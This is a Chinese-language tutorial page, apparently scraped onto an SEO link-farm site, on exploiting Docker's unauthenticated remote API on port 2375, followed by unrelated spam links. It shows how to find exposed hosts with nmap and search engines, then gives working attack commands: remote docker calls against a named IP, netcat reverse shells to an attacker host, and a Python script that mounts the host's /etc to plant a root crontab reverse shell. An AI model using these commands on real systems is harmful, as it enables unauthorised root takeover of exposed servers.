当前位置: 首页 > wzjs >正文

网站 留言板 制作关键词全网搜索工具

网站 留言板 制作,关键词全网搜索工具,淄博建设工程学校官方网站,郑州做网站的公司有哪些文章目录Docker介绍Docker开启远程访问漏洞发现漏洞利用反弹shell写入crontab反弹shellDocker介绍 Docker是利用LXC来实现类似VM的功能,从而利用更加节省的硬件资源提供给用户更多的计算资源。同VM的方式不同,LXC其并不是一套硬件虚拟化方法&#xff0d…

文章目录

  • Docker介绍
  • Docker开启远程访问
  • 漏洞发现
  • 漏洞利用
      • 反弹shell
      • 写入crontab反弹shell

Docker介绍

  • Docker是利用LXC来实现类似VM的功能,从而利用更加节省的硬件资源提供给用户更多的计算资源。同VM的方式不同,LXC其并不是一套硬件虚拟化方法-无法归属到全虚拟化、部分虚拟化和半虚拟化中的任意一个,而是一个操作系统级虚拟化方法,理解起来可能并不像VM那样直观。所以我们从虚拟化到docker要解决的问题出发,看看他是怎么满足用户虚拟化需求的。

Docker开启远程访问

systemctl status docker.service

在这里插入图片描述

vim /usr/lib/systemd/system/docker.service

在这里插入图片描述

-H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock

重新载入服务信息并重启docker

systemctl daemon-reload
systemctl restart docker.service

在这里插入图片描述

  • 防火墙状态设置
ufw status
ufw allow 2375
ufw reload

漏洞发现

  • 特定端口:2375
  • 搜索引擎:shodan、fofa
    在这里插入图片描述
nmap -A -p- -T4 -Pn xx.xx.xx.xx
[root@yang ~]# nmap -A -p 2375 -T4 -Pn localhost
Starting Nmap 7.70 ( https://nmap.org ) at 2025-07-10 18:20 CST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00019s latency).
Other addresses for localhost (not scanned): ::1PORT     STATE SERVICE VERSION
2375/tcp open  docker  Docker 25.0.1
| docker-version:
|   Components:
|
|       Version: 25.0.1
|       Name: Engine
|       Details:
|         ApiVersion: 1.44
|         BuildTime: 2024-01-23T23:09:31.000000000+00:00
|         MinAPIVersion: 1.24
|         Experimental: false
|         Os: linux
|         Arch: amd64
|         KernelVersion: 4.18.0-348.7.1.el8_5.x86_64
|         GitCommit: 71fa3ab
|         GoVersion: go1.21.6
|
|       Version: 1.6.27
|       Name: containerd
|       Details:
|         GitCommit: a1496014c916f9e62104b33d1bb5bd03b0858e59
|
|       Version: 1.1.11
|       Name: runc
|       Details:
|         GitCommit: v1.1.11-0-g4bccb38
|
|       Version: 0.19.0
|       Name: docker-init
|       Details:
|         GitCommit: de40ad0
|   BuildTime: 2024-01-23T23:09:31.000000000+00:00
|   ApiVersion: 1.44
|   GoVersion: go1.21.6
|   Arch: amd64
|   MinAPIVersion: 1.24
|   Os: linux
|   Version: 25.0.1
|   KernelVersion: 4.18.0-348.7.1.el8_5.x86_64
|   GitCommit: 71fa3ab
|   Platform:
|_    Name: Docker Engine - Community
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Content-Type: application/json
|     Date: Thu, 10 Jul 2025 10:20:33 GMT
|     Content-Length: 29
|     {"message":"page not found"}
|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 404 Not Found
|     Content-Type: application/json
|     Date: Thu, 10 Jul 2025 10:20:08 GMT
|     Content-Length: 29
|     {"message":"page not found"}
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Api-Version: 1.44
|     Docker-Experimental: false
|     Ostype: linux
|     Server: Docker/25.0.1 (linux)
|     Date: Thu, 10 Jul 2025 10:20:08 GMT
|     Content-Length: 0
|   docker:
|     HTTP/1.1 400 Bad Request: missing required Host header
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request: missing required Host header
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 - 3.10
Network Distance: 0 hopsOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.60 seconds

漏洞利用

  • 通过api直接查看容器状态,可以使用version、info查看具体的信息,直接查看容器里的进程。
docker -H tcp://18.16.202.95:2375 version
docker -H tcp://18.16.202.95:2375 images
docker -H tcp://18.16.202.95:2375 info
docker -H tcp://18.16.202.95:2375 ps
  • 利用创建命令创建并运行容器。
docker -H tcp://xx.xx.xx.xx:2375 run -it redis /bin/bash

反弹shell

  • 攻击机开启监听
nc -lvvp 8030
  • 目标机器执行
nc 192.168.1.21 8030 -e bin/sh
nc 192.168.1.21 8030 -e sh

写入crontab反弹shell

cd /root
cat exp.py
import dockerclient = docker.DockerClient(base_url='http://your-ip:2375')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw' }}):
http://www.dtcms.com/wzjs/407810.html

相关文章:

  • 石柱县城乡建设委员会网站网络推广的渠道和方式有哪些
  • 股票配资系统网站开发网络营销推广的手段
  • 网站开发介绍ppt汕头seo按天付费
  • 网站开发哪种语言好外贸新手怎样用谷歌找客户
  • 做网站开发的是不是程序员免费的html网站
  • 宁波网站优化公司电话竞价账户托管
  • 南昌建站软件品牌推广的目的和意义
  • 做网站没资源2345浏览器下载
  • wordpress友链代码芭嘞seo
  • 国外一家做乳胶衣视频的网站搜狗友链交换
  • 电子商务网站建设课程设计百度推广按点击收费
  • 自己可以做网站吗做搜索引擎优化的企业
  • 题库小程序源码广州seo优化
  • 婚庆公司网站建设网站排名查询站长之家
  • 中华人民建设部网站网络平台推广是干什么
  • 网站如何创建首页长春免费网上推广
  • 有那些app开发公司广州seo优化电话
  • 百度收录个人网站是什么怎么做2024最火的十大新闻
  • 网站建设基础服务营销策划公司排行榜
  • 手机网站设计尺寸大小互联网营销培训课程
  • 上海高端模板建站三生网络营销靠谱吗
  • 淘宝联盟怎么自己做网站推广2345网址中国最好
  • 阿里云网站建设方案书填写源码交易平台
  • 做冷库的网站百度sem优化师
  • mac 做网站开发培训中心
  • 平山县建设局网站免费seo网站的工具
  • 郑州设计师网站大全seo优化推广流程
  • 网站服务器暂时不可用怎么办手机网站模板免费下载
  • 中微电力建设公司网站手机免费建站系统
  • 佛山网站建设哪家便宜网站快速排名推荐